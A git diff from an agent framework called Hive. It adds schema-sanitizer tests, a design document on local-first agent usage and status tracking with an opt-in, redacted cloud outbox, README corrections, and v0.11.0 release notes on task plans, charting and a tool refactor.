+    assert _sanitize_schema_for_gemini({"anyOf": [{"type": ["string", "null"]}, {"type": "integer"}]}) == {
+        "anyOf": [{"type": "string", "nullable": True}, {"type": "integer"}]
+    }
+
+
+def test_does_not_mutate_input():
+    schema = {"type": "object", "properties": {"x": {"type": ["string", "null"]}}}
+    snapshot = {"type": "object", "properties": {"x": {"type": ["string", "null"]}}}
+    _sanitize_schema_for_gemini(schema)
+    assert schema == snapshot
+
+
+def test_pure_null_type_falls_back_to_string():
+    assert _sanitize_schema_for_gemini({"type": ["null"]}) == {
+        "type": "string",
+        "nullable": True,
+    }
+
+
+def test_multi_type_non_null_union_raises():
+    """Silently picking one type would change the contract; fail loud instead."""
+    with pytest.raises(ValueError, match="Unsupported Gemini schema union"):
+        _sanitize_schema_for_gemini({"type": ["string", "integer", "null"]})
+
+    with pytest.raises(ValueError, match="Unsupported Gemini schema union"):
+        _sanitize_schema_for_gemini({"type": ["string", "integer"]})
@@ -889,7 +889,7 @@ def test_concurrency_safe_allowlist_is_conservative():
    allowlist = ToolRegistry.CONCURRENCY_SAFE_TOOLS

    # Positive assertions: known-safe read operations are present.
-    for name in ("read_file", "grep", "glob", "search_files", "web_search"):
+    for name in ("read_file", "terminal_rg", "terminal_find", "search_files", "web_scrape"):
        assert name in allowlist, f"{name} should be concurrency-safe"

    # Negative assertions: nothing that mutates state is allowed in.
@@ -0,0 +1,331 @@
+# Agent Usage & Status Tracking — Capability Document
+
+**Audience:** Lead software architect (paired with frontend + business requirement docs)
+**Scope:** Queen agent first (default local-runtime entry point), then downstream colonies/workers
+**Status:** Capability inventory + proposal — no implementation commitments
+**Date:** 2026-05-04
+
+---
+
+## 1. Why this document exists
+
+We have a business need to track **agent usage** (what was consumed: tokens, cost, runtime, calls) and **agent status** (what state agents are in: alive, phase, progress, blocked) starting from the Queen agent, and surface this **on the cloud** for product and business consumers. This document inventories the capabilities the runtime can expose **today** vs. what is **net-new**, so architecture can pick a scope before frontend and product write against it.
+
+The Queen is the right anchor: every local-runtime session today starts with a Queen, and every colony/worker is forked from a Queen call — so a tracking surface rooted at the Queen automatically covers the whole agent tree.
+
+> **Headline constraint for the architect:** the runtime is **local-by-default**. Every byte described in §3 — events, runtime logs, progress DBs, session state, LLM cost numbers — is written to the user's machine under `~/.hive/` (or the platform-specific Electron `userData` directory). **Nothing is shipped to the cloud today.** The business ask therefore implies a new local→cloud transport boundary, with the data-residency, privacy, and identity decisions that come with it. §4.5 makes the gap explicit per-surface; §8 lists the risks; §9 frames the cloud cut-over as the gating decision for any "Slice 2+" work.
+
+---
+
+## 2. Vocabulary — what we actually mean
+
+| Term | Definition in this codebase |
+|---|---|
+| **Session** | One Queen runtime instance. ID: `session_{YYYYMMDD_HHMMSS}_{uuid8}`. Persisted at `~/.hive/sessions/{session_id}/`. |
+| **Queen** | Long-lived conversational agent. One per session. Single event-loop node. Phases: `independent → incubating → working → reviewing`. See [queen/nodes/__init__.py:494-518](../../core/framework/agents/queen/nodes/__init__.py#L494-L518). |
+| **Colony** | Persistent stateless container forked by `create_colony`. Has its own SQLite progress DB at `~/.hive/colonies/{colony_name}/data/progress.db`. |
+| **Worker** | Ephemeral agent running inside a colony to execute a task. |
+| **Run / execution** | One trigger-to-completion invocation inside a node. Carries `run_id`, `execution_id`, `trace_id` (OTel-aligned). |
+| **Usage** | Quantitative consumption: input/output/cached tokens, USD cost, wall-clock latency, tool-call counts. |
+| **Status** | Qualitative state: phase, alive/stalled, current task, blocked-on, queue depth, last-heartbeat. |
+
+---
+
+## 3. What exists today (capabilities, not commitments)
+
+The runtime is already heavily instrumented. Most of what business wants is **already emitted** — the gap is persistence, aggregation, and a stable API surface.
+
+### 3.1 Event Bus — the spine
+
+[core/framework/host/event_bus.py:61-177](../../core/framework/host/event_bus.py#L61-L177) defines an in-process async pub/sub with **40+ event types** scoped by `stream_id`, `session_id`, `colony_id`, `execution_id`, `run_id`, `correlation_id`, `timestamp`.
+
+Relevant for usage/status:
+
+- **Lifecycle:** `EXECUTION_STARTED/COMPLETED/FAILED/PAUSED/RESUMED/RESURRECTED`
+- **Queen:** `QUEEN_PHASE_CHANGED`, `QUEEN_IDENTITY_SELECTED`
+- **Colony/Worker:** `COLONY_CREATED`, `WORKER_COLONY_LOADED`, `WORKER_COMPLETED`, `WORKER_FAILED`, `SUBAGENT_REPORT`
+- **LLM:** `LLM_TURN_COMPLETE`, `LLM_TEXT_DELTA`, `LLM_REASONING_DELTA`, `CONTEXT_USAGE_UPDATED`
+- **Tools:** `TOOL_CALL_STARTED`, `TOOL_CALL_COMPLETED`, `TOOL_CALL_REPLAY_DETECTED`
+- **Health:** `NODE_STALLED`, `NODE_TOOL_DOOM_LOOP`, `STREAM_TTFT_EXCEEDED`, `STREAM_INACTIVE`, `STREAM_NUDGE_SENT`
+- **Tasks (right-rail panel):** `TASK_CREATED`, `TASK_UPDATED`, `TASK_DELETED`, `TASK_LIST_RESET`
+- **Triggers:** `TRIGGER_AVAILABLE/ACTIVATED/DEACTIVATED/FIRED/REMOVED/UPDATED`
+
+> Persistence today: in-memory only, **plus** optional JSONL export when `HIVE_DEBUG_EVENTS=1` ([event_bus.py:33-54](../../core/framework/host/event_bus.py#L33-L54)). There is no SQL events table.
+
+### 3.2 Three-level runtime logs (per session)
+
+[core/framework/tracker/runtime_log_schemas.py](../../core/framework/tracker/runtime_log_schemas.py) defines:
+
+| Level | Schema | File | Granularity |
+|---|---|---|---|
+| L1 | `RunSummaryLog` | `summary.json` | Per graph run — totals + execution_quality + trace_id |
+| L2 | `NodeDetail` | `details.jsonl` | Per node — exit_status, input/output tokens, latency_ms, retry/accept/escalate/continue counts |
+| L3 | `NodeStepLog` | `tool_logs.jsonl` | Per LLM step — tool calls, verdicts, error traces, latency_ms |
+
+Storage: `~/.hive/sessions/{session_id}/logs/` ([runtime_log_store.py](../../core/framework/tracker/runtime_log_store.py)). Schemas already carry OTel fields (`trace_id`, `span_id`, `parent_span_id`) — wire-ready, not yet exported.
+
+### 3.3 LLM call accounting
+
+[core/framework/llm/provider.py:11-32](../../core/framework/llm/provider.py#L11-L32) — `LLMResponse` carries: `model`, `input_tokens`, `output_tokens`, `cached_tokens`, `cache_creation_tokens`, `cost_usd`, `stop_reason`. Cost is computed from [model_catalog.py](../../core/framework/llm/model_catalog.py) when the model is priced; otherwise `0.0`.
+
+> Gap: cost lives in the response object and is rolled into L2/L3 logs, but is **not** in the event bus stream and **not** in any aggregate query surface.
+
+### 3.4 Colony Progress DB
+
+[core/framework/host/progress_db.py:44-110](../../core/framework/host/progress_db.py#L44-L110) — per-colony SQLite (WAL mode):
+
+- `tasks` (id, seq, priority, goal, status: pending|claimed|started|completed|failed, worker_id, claimed_at, started_at, completed_at, retry_count, last_error)
+- `steps`, `sop_checklist`, `colony_meta`
+
+This is the closest thing we have to a status SQL store today, but it is **per-colony** and **task-shaped** — not session-shaped or usage-shaped.
+
+### 3.5 Queen task system (right-rail panel)
+
+The mechanism the IDE-selection prompt describes is real: each `task_update` emits `TASK_UPDATED` on the bus, which a future SSE/WS surface can stream. State transitions: `pending → in_progress → completed`. Task body carries `subject`, `active_form`, `blocks`, `blocked_by`, `metadata`. Source: [tasks/events.py:52-159](../../core/framework/tasks/events.py#L52-L159).
+
+### 3.6 HTTP surface (already shipping)
+
+[core/framework/server/routes_sessions.py](../../core/framework/server/routes_sessions.py):
+
+- `POST /api/sessions` — create
+- `GET /api/sessions/{session_id}` — current state including `queen_phase`, `queen_model`, `colony_id`, `uptime_seconds`
+- `GET /api/sessions/{session_id}/stats` — runtime statistics (extension point)
+- `GET /api/sessions/{session_id}/events/history` — replay persisted events
+
+SSE primitive exists at [server/sse.py](../../core/framework/server/sse.py) but is **not yet wired to a global event-stream route**. This is the natural attach point for a real-time status feed.
+
+### 3.7 Worker health snapshot
+
+`get_worker_health_summary()` ([worker_monitoring_tools.py:71-99](../../core/framework/tools/worker_monitoring_tools.py#L71-L99)) returns: `session_id`, `session_status`, `total_steps`, `recent_verdicts`, `stall_minutes`, `evidence_snippet`. Used today by Queen during the WORKING phase; can be exposed via API.
+
+---
+
+## 3.8 Where every byte lives today (data residency map)
+
+Every storage location below is **on the end-user's machine**. There is no cloud sink, no telemetry endpoint, no managed database, no analytics service. The HTTP server in [core/framework/server/](../../core/framework/server/) binds to localhost for the desktop UI; it is not a cloud API.
+
+`HIVE_HOME` defaults to `~/.hive/` and is overridden by the desktop shell to the platform `userData` dir (e.g. `~/Library/Application Support/Hive/` on macOS, `%APPDATA%\Hive\` on Windows). Source: [config.py:20-44](../../core/framework/config.py#L20-L44).
+
+| Data | On-disk location (per machine) | Format | Lifetime | Currently shipped off-device? |
+|---|---|---|---|---|
+| Event bus stream | in-process memory only | Python objects | Process lifetime | No |
+| Event debug log (opt-in) | `HIVE_HOME/event_logs/<ts>.jsonl` when `HIVE_DEBUG_EVENTS=1` | JSONL | Until user deletes | No |
+| Session state | `HIVE_HOME/sessions/{session_id}/state.json` | JSON | Until user deletes | No |
+| Conversations | `HIVE_HOME/sessions/{session_id}/conversations/` | JSON | Until user deletes | No |
+| Artifacts | `HIVE_HOME/sessions/{session_id}/artifacts/` | mixed | Until user deletes | No |
+| L1 run summary (tokens, cost, quality) | `HIVE_HOME/sessions/{session_id}/logs/summary.json` | JSON | Until user deletes | No |
+| L2 node details | `HIVE_HOME/sessions/{session_id}/logs/details.jsonl` | JSONL | Until user deletes | No |
+| L3 step / tool logs | `HIVE_HOME/sessions/{session_id}/logs/tool_logs.jsonl` | JSONL | Until user deletes | No |
+| Colony task / step / SOP state | `HIVE_HOME/colonies/{colony_name}/data/progress.db` | SQLite (WAL) | Until user deletes | No |
+| Queen / colony / skill / memory configs | `HIVE_HOME/{queens,colonies,skills,memories}/` | files | Until user deletes | No |
+| LLM `cost_usd` numbers | computed in-process from [model_catalog.py](../../core/framework/llm/model_catalog.py), then written into L1/L2/L3 logs above | — | Same as logs | No |
+
+**What this means for the cloud requirement:** the question for the architect is not "where do we get the data" — the data is fully captured. The question is **"how does it leave the machine, in what shape, with whose consent, and where does it land."** That decision is upstream of every endpoint in §6 and every storage option in §5.
+
+Three architectural shapes worth considering (architect to choose):
+
+- **Shape A — On-device only, queried over LAN/tunnel.** Cloud product reaches into the runtime via an authenticated tunnel; no data is replicated. Strongest privacy. Hardest for cross-device rollups.
+- **Shape B — Outbox push.** Runtime keeps the local store as source of truth and asynchronously pushes a redacted, billing-grade subset (no prompts, no tool args by default) to a cloud aggregate. Best fit for the typical "agent status dashboard + usage rollup" product.
+- **Shape C — Cloud-first runtime.** Runtime writes events directly to a cloud bus and treats local files as a cache. Largest rewrite; not recommended for a desktop-first product.
+
+Shape B is the lowest-friction path to the stated business outcome. The rest of this document is written with Shape B as the default and calls out where Shape A or C would change things.
+
+---
+
+## 4. Capability matrix — what we can offer
+
+Each row is a candidate frontend/business surface, scored by feasibility from current state.
+
+| # | Capability | Status | Backed by |
+|---|---|---|---|
+| **Status** | | | |
+| S1 | Queen phase indicator (independent/incubating/working/reviewing) | **Ready** | `QUEEN_PHASE_CHANGED` event + session detail field |
+| S2 | Per-task progress (right-rail) | **Ready** | `TASK_*` events |
+| S3 | Live LLM streaming indicator (typing, thinking, tool-calling) | **Ready** | `LLM_TEXT_DELTA`, `LLM_REASONING_DELTA`, `TOOL_CALL_STARTED/COMPLETED` |
+| S4 | Stall / stuck-agent detection | **Ready** | `NODE_STALLED`, `STREAM_INACTIVE`, `NODE_TOOL_DOOM_LOOP` |
+| S5 | Colony tree (Queen → colonies → workers) snapshot | **Partial** — data exists in session/colony stores; need a join query |
+| S6 | Worker health roll-up across colonies | **Partial** — per-worker tool exists; needs aggregation route |
+| S7 | Liveness heartbeat ("agent X last seen Y ago") | **Net-new** — must derive from event timestamps or add a periodic ping |
+| S8 | Trigger schedule (when will Queen wake next) | **Ready** | `TRIGGER_*` events |
+| **Usage** | | | |
+| U1 | Tokens per session (input/output/cached) | **Partial** — captured per-step in L3, summed in L1; no API |
+| U2 | USD cost per session / colony / model | **Partial** — `cost_usd` per LLM call in logs; no rollup |
+| U3 | Tool-call counts and types | **Partial** — events exist; no aggregate |
+| U4 | Wall-clock runtime and active-time per agent | **Partial** — derivable from `EXECUTION_STARTED/COMPLETED` |
+| U5 | Cost attribution per Queen-spawned colony | **Partial** — `colony_id` is on every event; needs a query |
+| U6 | Per-user / per-tenant aggregation | **Net-new** — there is no user/tenant identity in events today |
+| U7 | Daily / monthly usage rollups for billing | **Net-new** — requires persistent event store |
+| U8 | Quota / cap enforcement (block when over budget) | **Net-new** — requires real-time meter + policy hook |
+
+**Read of the matrix:** ~70% of "status" surfaces are **shipping-grade today** behind a thin local API. ~70% of "usage" surfaces need a **persistence + aggregation layer**. The events themselves are not the bottleneck.
+
+**Local vs. cloud read of the same matrix.** Every "Ready" / "Partial" cell above is *ready in-process on the local machine*. Making each row visible to a **cloud** consumer adds an additional step:
+
+| Capability class | Local (today / near-term) | Cloud (business ask) |
+|---|---|---|
+| Live status (S1–S4, S8) | Stream from in-process event bus over local SSE | Push events through outbox → cloud relay → cloud SSE/WS to product UI. |
+| Tree / health (S5, S6) | Join local session + colony stores | Same join, but on cloud-side replica of session/colony index. |
+| Liveness (S7) | Derive from local event timestamps | Requires the runtime to *post* a heartbeat; cloud cannot infer aliveness from absence. |
+| Per-session usage (U1–U5) | Read L1/L2/L3 logs on disk | Outbox sends durable rows (no deltas) to cloud usage table. |
+| Tenant rollups (U6–U7) | Not possible — no identity in events | Cloud-side aggregation keyed on session→user join, identity attached at outbox time. |
+| Quotas (U8) | Local meter feasible, but pointless without cloud truth | Cloud is the meter of record; runtime calls home to check. |
+
+---
+
+## 5. Proposed data model (architect to validate)
+
+Three new persisted entities, plus reuse of existing event types:
+
+```
+AgentSession                     UsageEvent                    StatusSnapshot
+-----------                      -----------                   ---------------
+session_id (PK)                  id (PK)                       session_id (FK)
+queen_id                         session_id (FK)               taken_at
+queen_model                      colony_id                     phase
+started_at                       worker_id                     active_run_id
+ended_at                         agent_role  (queen|worker)    active_node
+status      (active|done|failed) event_type  (LLM|TOOL|...)    open_task_count
+user_id     (when multi-tenant)  model                         in_flight_workers
+tenant_id   (when multi-tenant)  input_tokens                  last_event_at
+total_input_tokens               output_tokens                 stall_score
+total_output_tokens              cached_tokens
+total_cached_tokens              cost_usd
+total_cost_usd                   latency_ms
+total_tool_calls                 tool_name      (nullable)
+last_event_at                    occurred_at
+                                 trace_id
+                                 execution_id
+```
+
+Storage choice (architect call). **All three options today are local; only Option C reaches the cloud business surface.**
+
+- **Option A — local SQLite outbox** at `HIVE_HOME/runtime.db`. Pros: zero infra, fits desktop, makes local queries cheap. Cons: per-host; no cross-device aggregation; **does not satisfy the cloud requirement on its own.**
+- **Option B — DuckDB on the existing JSONL event logs.** Pros: zero ingestion code; analyst-friendly. Cons: cold-start latency on big histories; **also local-only.**
+- **Option C — push events to a managed cloud store** (Postgres, ClickHouse, BigQuery) via an outbox pattern. Pros: cross-host rollups, billing-grade, the only option that actually delivers the cloud-visible status/metrics product. Cons: introduces a new transport, identity, and privacy/redaction story; needs explicit user opt-in for desktop builds.
+
+The realistic shape is the hybrid called out in §3.8 Shape B: **A locally** as the durable buffer and source of truth, **C in the cloud** as the business-facing aggregate, with a one-way outbox that moves a *redacted, durable-event-only* subset over the wire. This document recommends that hybrid; everything in §6 and §7 is written against it.
+
+---
+
+## 6. Surface API — what frontend would consume
+
+All routes assume the event-bus → SSE bridge exists (the one missing wire — see §3.6). Frontend sees this from day one.
+
+> **Locality note.** The `/api/...` routes below are served by the **local runtime HTTP server** today. For the cloud product, the same shapes need a cloud-side counterpart fed by the outbox. Two practical patterns: (1) cloud product calls cloud-hosted versions of these routes (against the aggregate), or (2) cloud product proxies authenticated requests back to the user's runtime. §3.8 Shape A vs. Shape B picks between them.
+
+### Real-time channel
+
+```
+GET  /api/sessions/{session_id}/events/stream      (SSE)
+       ↳ filter=phase,task,llm_stream,tool,worker,trigger,health
+GET  /api/agents/queen/stream                      (SSE) — global queen events
+```
+
+### Status reads
+
+```
+GET  /api/sessions/{session_id}                    — already shipping
+GET  /api/sessions/{session_id}/tree               — Queen → colonies → workers
+GET  /api/sessions/{session_id}/health             — stall_score, last_event_at, in_flight
+GET  /api/colonies/{colony_id}/workers             — health roll-up
+```
+
+### Usage reads
+
+```
+GET  /api/sessions/{session_id}/usage              — tokens, cost, latency, tool-calls
+GET  /api/sessions/{session_id}/usage/by-model     — split by model
+GET  /api/colonies/{colony_id}/usage               — same shape, colony scope
+GET  /api/agents/queen/usage?range=...&group_by=... — rollup view (billing)
+```
+
+### Admin / business
+
+```
+GET  /api/usage/rollup?range=...&group_by=user|tenant|model|colony
+POST /api/quotas/{tenant}                          — set caps (if quota work in scope)
+```
+
+---
+
+## 7. Net-new work — sized in shirt-size, not days
+
+| Workstream | Local / Cloud | Size | Depends on | Notes |
+|---|---|---|---|---|
+| Event-bus → local SSE bridge ([sse.py](../../core/framework/server/sse.py) exists, route does not) | Local | **S** | — | Unlocks all real-time status surfaces in the desktop UI. Highest leverage piece. |
+| Persisted local event store (SQLite outbox) | Local | **M** | Decision §5 | One writer, append-only; reuse existing JSONL writer. Source of truth for cloud push. |
+| Local aggregation queries + `/usage` endpoints | Local | **M** | Persisted store | Per-session usage on disk. |
+| **Outbox transport (local → cloud)** | **Boundary** | **M–L** | Local store + auth | New work: durable queue, retry, redaction policy, opt-in switch, schema versioning. This is the bridge to the cloud product. |
+| **Cloud event ingest + aggregate store** | **Cloud** | **L** | Outbox transport | New cloud infra (Postgres/ClickHouse/BigQuery). Hosting, ops, retention policy, access controls. |
+| **Cloud-side status/usage API + dashboards** | **Cloud** | **M** | Cloud aggregate | Mirrors §6 endpoints against the cloud store; this is what business users actually see. |
+| Identity layer (user_id / tenant_id on events) | Boundary | **M** | Auth model | Currently no user identity in events. Identity attaches at outbox time, not at emit time. |
+| OpenTelemetry exporter (schema is ready) | Boundary | **S–M** | — | `trace_id`/`span_id` already populated; an OTel collector can be the cloud sink instead of a custom outbox. |
+| Quota / policy hooks | Cloud-authoritative | **L** | Cloud store + identity | Cloud holds the meter; runtime calls home synchronously on a critical path. |
+| Liveness/heartbeat (S7) | Local emit, cloud consume | **S** | Outbox | Runtime must actively post; cloud cannot infer liveness from absence. |
+| Cost attribution UI rollups | Cloud | **S** | `/usage` cloud endpoints | Shared with frontend doc. |
+
+**Critical path for first frontend release (local desktop UI):** SSE bridge → status endpoints (S1–S5) → per-session usage endpoint (U1, U2). Everything else is incremental.
+
+**Critical path for first cloud release (business ask):** local event store → outbox transport with redaction + opt-in → cloud ingest → cloud `/usage` and `/status` endpoints. The local UI work above is *not* a prerequisite for the cloud cut, but most of the local-side primitives (event store, durable-event filtering) are shared, so doing them in order minimizes rework.
+
+---
+
+## 8. Risks and tradeoffs the architect should weigh
+
+1. **Event volume.** `LLM_TEXT_DELTA` fires per token. A persisted store must filter — don't write deltas, write `LLM_TURN_COMPLETE`. This is the #1 way the table blows up.
+2. **Privacy / desktop posture — the central architectural constraint.** The runtime is local by default ([config.py:20-44](../../core/framework/config.py#L20-L44)). The data inventory in §3.8 confirms that **no data leaves the user's machine today**, including the data the business ask needs in the cloud. Closing that gap is not "add a metrics push" — it is a new system boundary with: (a) explicit user opt-in (defaults must be safe for OSS / self-hosted users), (b) a documented redaction list (no prompts, no tool args, no file paths in the default payload), (c) schema versioning so cloud aggregates do not break on runtime upgrades, (d) a clear answer for self-hosted / air-gapped deployments where the cloud sink is unreachable, (e) regional data-residency rules if the product is sold internationally. This is the single largest design decision in the document.
+3. **Cost-table accuracy.** `cost_usd` is computed from a static catalog. Using it for billing means committing to keeping the catalog current (or pulling from provider invoices). For *display*, the current approach is fine; for *charging*, it is not.
+4. **Identity coupling.** Events are session-scoped today. Adding `user_id`/`tenant_id` everywhere is invasive. Recommend pinning identity at the *session* boundary and joining on session at query time, rather than threading identity through every event payload.
+5. **Status vs. heartbeat semantics.** "Idle" is not "dead." A Queen sitting in `independent` waiting for a user message is healthy and should not page anyone. The stall-score in §5 must distinguish idle-by-design from stalled-by-bug — the existing `STREAM_INACTIVE` / `NODE_STALLED` events already make this distinction; preserve it.
+6. **Backpressure from observability.** If usage tracking sits in the LLM call path (for quotas), it must not add latency. Recommend: meter is async/eventual for display; only quota checks are synchronous, and only when the customer has a quota.
+7. **Worker-side gap.** Worker LLM calls are accounted in their own session's L1–L3 logs but are *not* automatically rolled into the parent Queen session. Cost attribution from Queen → spawned colony requires either (a) a parent_session_id field on the colony's session row, or (b) walking the `COLONY_CREATED` event graph at query time. (a) is cleaner.
+
+---
+
+## 9. Recommendation
+
+Ship in four thin slices. The first two are local-only and unblock the desktop UI; the last two are what actually deliver the business ask of cloud-visible status and metrics.
+
+1. **Slice 1 — Live local status (1 sprint, fully local).**
+   SSE bridge + `/sessions/{id}/events/stream` + `/sessions/{id}/health` + `/sessions/{id}/tree`. Frontend (local UI) gets the right-rail and the agent-tree. No persistence work, no cloud. (S1–S5, S8.)
+
+2. **Slice 2 — Per-session local usage store (1–2 sprints, fully local).**
+   Persisted event store (SQLite outbox at `HIVE_HOME/runtime.db`), filtered to durable event types only. `/sessions/{id}/usage` + `/colonies/{id}/usage`. No identity, no rollups, **no cloud transport yet**. This is the foundation the cloud slice rides on. (U1–U5.)
+
+3. **Slice 3 — Local→cloud outbox + cloud ingest (the cloud cut, scope-defining).**
+   Durable outbox queue, redaction policy, opt-in toggle, identity attachment, schema versioning, retry/backoff. Cloud-side ingest service + aggregate store. **This is where the local-only world becomes a cloud product.** Architect must decide §3.8 Shape, §5 storage, redaction defaults, and identity model before this slice can start.
+
+4. **Slice 4 — Cloud rollups, dashboards, quotas (scope TBD with product).**
+   Tenant aggregation, daily/monthly rollups, quota enforcement, OTel export, business dashboards. (U6–U8.) Defer until business confirms billing model — the answer (per-seat vs. per-token vs. per-colony) changes the data model.
+
+Slices 1 and 2 are mostly **wiring** — the events exist, the schemas exist, the storage paths exist. Slice 3 is the **first slice that introduces a new architectural boundary** (local→cloud transport + identity + privacy contract); everything novel about the business ask lives there. Slice 4 is **business design**, not engineering scope.
+
+---
+
+## 10. Open questions for the architect
+
+The first four are direct consequences of the local-first / cloud-required gap surfaced in §3.8 and §8.2.
+
+1. **Cloud transport shape — Shape A, B, or C from §3.8?** This decision is upstream of the entire data model. Recommend Shape B (outbox push) absent a strong privacy argument for Shape A.
+2. **Redaction default for the cloud payload.** What goes (model, token counts, latency, tool names, status) vs. what stays local (prompts, tool arguments, tool results, file paths, conversation content)? Need a written allowlist before Slice 3 starts.
+3. **Self-hosted / air-gapped users.** If the cloud sink is unreachable or disabled, what does the runtime do — buffer indefinitely, drop oldest, or refuse to start? Defaults differ for OSS vs. SaaS distributions.
+4. **Identity binding point.** Do we attach `user_id` / `tenant_id` at event-emit time (invasive, threads identity through every node), at session-create time (clean, requires session-level auth), or at outbox-flush time (simplest, but loses per-event provenance)? Recommend session-create.
+5. Do we need quota *enforcement*, or only quota *visibility* in v1?
+6. Frontend doc: are status and usage rendered in the same panel or different surfaces? This affects whether we ship one merged endpoint or two.
+7. Are we willing to pay the cost-table maintenance burden, or should "cost" stay labeled as estimated and not be used for invoicing?
+
+---
+
+## Appendix — Pointers
+
+- Queen lifecycle: [core/framework/agents/queen/nodes/__init__.py](../../core/framework/agents/queen/nodes/__init__.py)
+- Event bus + types: [core/framework/host/event_bus.py](../../core/framework/host/event_bus.py)
+- Runtime log schemas: [core/framework/tracker/runtime_log_schemas.py](../../core/framework/tracker/runtime_log_schemas.py)
+- Runtime log store: [core/framework/tracker/runtime_log_store.py](../../core/framework/tracker/runtime_log_store.py)
+- LLM accounting: [core/framework/llm/provider.py](../../core/framework/llm/provider.py), [model_catalog.py](../../core/framework/llm/model_catalog.py)
+- Colony progress DB: [core/framework/host/progress_db.py](../../core/framework/host/progress_db.py)
+- Task events: [core/framework/tasks/events.py](../../core/framework/tasks/events.py)
+- Session HTTP: [core/framework/server/routes_sessions.py](../../core/framework/server/routes_sessions.py)
+- SSE primitive: [core/framework/server/sse.py](../../core/framework/server/sse.py)
+- Worker health: [core/framework/tools/worker_monitoring_tools.py](../../core/framework/tools/worker_monitoring_tools.py)
+- Config / env vars: [core/framework/config.py](../../core/framework/config.py)
@@ -115,7 +115,7 @@ Hive LLM:
 Notes:

 - Set `provider` to `hive`
- Common Hive model values are `queen`, `kimi-2.5`, and `GLM-5`
+- Common Hive model values are `queen`, `kimi-k2.5`, and `GLM-5`
 - Hive LLM requests use the Hive endpoint at `https://api.adenhq.com`

 ### Search & Tools (optional)
@@ -414,7 +414,7 @@ cd core && uv run python tests/dummy_agents/run_all.py --verbose
 | parallel_merge | 4     | Fan-out/fan-in, failure strategies                  |
 | retry          | 4     | Retry mechanics, exhaustion, `ON_FAILURE` edges     |
 | feedback_loop  | 3     | Feedback cycles, `max_node_visits`                  |
-| worker         | 4     | Real MCP tools (`example_tool`, `get_current_time`, `save_data`/`load_data`) |
+| worker         | 4     | Real MCP tools (`get_current_time`, `save_data`/`load_data`) |

 Typical runtime is 1–3 minutes depending on provider latency.

@@ -0,0 +1,127 @@
+# 🐝 Hive Agent v0.11.0: Action Plans, Charts, and a Cleaner Queen
+
+> Major features released in Hive 0.11. Now Queen has an action plan for everything and charting capability to do analytics for you. Overall the conversation and agent experience is also improved a lot thanks to a major Queen prompt and tools refactor.
+
+---
+
+## ✨ Highlights
+
+### 📋 Queen now keeps an action plan for everything
+
+A new file-backed task system gives Queen a persistent, structured plan for every conversation — visible to the user, editable on the fly, and surviving session reload.
+
+- **File-backed task store** under `core/framework/tasks/` with full CRUD, scoping, hooks, and reminders. Tasks live on disk so they outlast a single agent run and can be inspected, replayed, or shared between Queen and colony workers.
+- **Multi-task creation in one call** — Queen can stage a whole plan up front instead of dripping out one task at a time, then tick items off as it works.
+- **Colony task templates** — colonies can publish a template task list that Queen picks up when the colony is invoked, so recurring workflows start with the same plan every time.
+- **Live task list in the UI** — a new `TaskListPanel` renders the plan in real time next to the chat, with item status flowing through the event bus as Queen marks tasks done.
+- **Task reminders + hooks** wire into Queen's loop so the plan stays in front of the model and structural blockers preventing tool calls on `task_*` are now resolved.
+
+### 📊 Charting capability for analytics
+
+Queen can now produce real charts inline in the conversation, not just describe them.
+
+- **New `chart_tools` MCP server** with ECharts and Mermaid renderers, an OpenHive theme, and a `chart-creation-foundations` skill that teaches Queen when to chart vs. when to table.
+- **Inline chart rendering in chat** — `EChartsBlock` and `MermaidBlock` components render the chart spec directly in the transcript; tool results get a contentful display with `ChartToolDetail` instead of a JSON dump.
+- **Chart spec normalization** in the renderer keeps Y-axis scaling, series colors, and theme tokens consistent regardless of how Queen phrases the spec.
+
+### 🧹 Major Queen prompt + tools refactor
+
+The biggest cleanup of Queen's tool surface and prompt since v0.7. Fewer, sharper tools; a shorter, more focused prompt; and a clearer model of what Queen has access to vs. what colonies do.
+
+- **File ops consolidated** — `apply_diff`, `apply_patch`, `hashline_edit`, the old `data_tools`, `grep_search`, and the legacy `coder_tools_server` are gone. A single rewritten `file_ops` module covers read / search / list / edit with a more predictable interface and ~1.7k fewer lines on net.
+- **Search and list-files unified** into one toolkit so Queen stops juggling near-duplicate variants.
+- **Browser tools audit** — interactions, navigation, tabs, and lifecycle trimmed and consolidated; `web_scrape` and `browser_open` merged into a single web-search-and-open path.
+- **New shell/terminal toolkit** (`shell_tools`) — replaces the old `execute_command_tool` and the inline command sanitizer with a typed module that has proper job control, PTY sessions, ring-buffered output, semantic exit codes, and a destructive-command warning gate. Five new preset skills (`shell-tools-foundations`, `-fs-search`, `-job-control`, `-pty-sessions`, `-troubleshooting`) teach Queen the new surface.
+- **Old lifecycle tools removed** — `queen_lifecycle_tools.py` shrunk by ~900 lines as deprecated default tools came out.
+- **Prompt simplification + improvements** — Queen's node prompts dropped redundant `_queen_style` blocks, tightened phrasing, and now lean on the task system for plan-keeping instead of restating the plan every turn.
+- **Tools editor frontend grouping** — `ToolsEditor.tsx` groups tools by category so configuring a queen profile is no longer a flat scroll through 80+ entries.
+
+---
+
+## 🆕 What's New
+
+### Tasks & Action Plans
+
+- **`core/framework/tasks/`** — full task subsystem: `store`, `models`, `events`, `hooks`, `reminders`, `scoping`, plus a `tools/` package exposing session and colony task tools to Queen. (@RichardTang-Aden)
+- **`POST /api/tasks` routes** for the frontend to read and mutate the live plan. (@RichardTang-Aden)
+- **`TaskListPanel` + `TaskItem` + `TaskListContext`** on the frontend render the plan in real time. (@RichardTang-Aden)
+- **Multi-task creation tool** lets Queen stage a whole plan in one call. (@RichardTang-Aden)
+- **Colony task templates** — colonies ship with a default task list that Queen adopts on entry. (@RichardTang-Aden)
+- **Hook + reminder fixes** so Queen reliably uses `task_*` tools instead of skipping them. (@RichardTang-Aden)
+
+### Charts
+
+- **`tools/src/chart_tools/`** — new MCP server with `renderer.py`, `theme.py`, `tools.py`, plus bundled `echarts.min.js` and `mermaid.min.js`. (@TimothyZhang7)
+- **`chart-creation-foundations` skill** teaches Queen when and how to chart. (@TimothyZhang7)
+- **`EChartsBlock` / `MermaidBlock` / `ChartToolDetail`** components render charts inline. (@TimothyZhang7)
+- **OpenHive chart theme** (`openhiveTheme.ts`) keeps chart styling consistent with the rest of the UI. (@TimothyZhang7)
+- **Chart spec normalization** in the renderer fixes Y-axis edge cases and series defaults. (@TimothyZhang7)
+
+### Queen Prompt & Tools Refactor
+
+- **Major file ops refactor** — single rewritten `file_ops` module replaces `apply_diff`, `apply_patch`, `hashline_edit`, `grep_search`, `data_tools`, and the legacy `coder_tools_server`. (@RichardTang-Aden)
